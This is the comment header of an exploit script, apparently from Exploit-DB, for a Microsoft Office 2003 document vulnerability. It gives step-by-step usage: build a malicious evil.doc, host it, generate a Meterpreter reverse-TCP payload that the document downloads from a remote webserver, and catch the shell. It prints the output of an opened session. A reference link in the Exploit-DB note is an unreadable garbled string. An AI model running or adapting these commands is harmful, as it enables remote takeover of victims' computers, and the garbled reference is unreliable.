#
# Note from the Exploit-DB team: This might be the same bug as:
# f78K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6J5j5i4m8A6k6o6N6Q4x3V1k6E0k6i4c8S2M7%4m8D9L8$3W2@1i4K6u0V1k6Y4u0S2L8h3g2%4L8%4u0C8i4K6u0r3j5X3I4G2j5W2)9J5c8X3#2S2M7%4c8W2M7W2)9J5c8X3#2G2k6s2g2D9k6i4y4Q4x3V1k6W2P5s2m8D9L8$3W2@1M7#2)9J5c8Y4N6A6L8X3c8G2N6%4y4Q4x3V1k6X3K9h3I4W2k6X3!0J5L8h3q4@1i4K6u0r3L8i4x3I4x3q4)9#2k6U0l9^5y4#2)9#2k6Y4u0@1k6W2)9#2k6Y4m8X3M7X3q4Y4L8h3g2F1N6s2y4Q4y4h3k6T1L8$3k6Q4x3X3g2J5j5R3`.`.
#
#-----------------------------------------------------------------------------------#
# Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3 #
# Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges) #
#####################################################################################
# One shellcode to rule them all, One shellcode to find them, One shellcode to #
# bring them all and in the darkness bind them!! #
# #
# Greetings: offsec, corelan, setoolkit #
#####################################################################################
# (1) root@bt:~/Desktop/office# ./office2003.py #
# root@bt:~/Desktop/office# mv evil.doc /var/www/ #
# #
# (2) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=9988 X #
# > /var/www/magic.exe #
# #
# (3) msf exploit(handler) > exploit #
# #
#
Started reverse handler on 192.168.111.132:9988 #
#
Starting the payload handler... #
#
Sending stage (752128 bytes) to 192.168.111.128 #
#
Meterpreter session 1 opened (192.168.111.132:9988 -> 192.168.111.128:1073)#
#-----------------------------------------------------------------------------------#
# Since we are downloading our payload from a remote webserver there are no #
# restrictions on payload size or badcharacters... #
#-----------------------------------------------------------------------------------#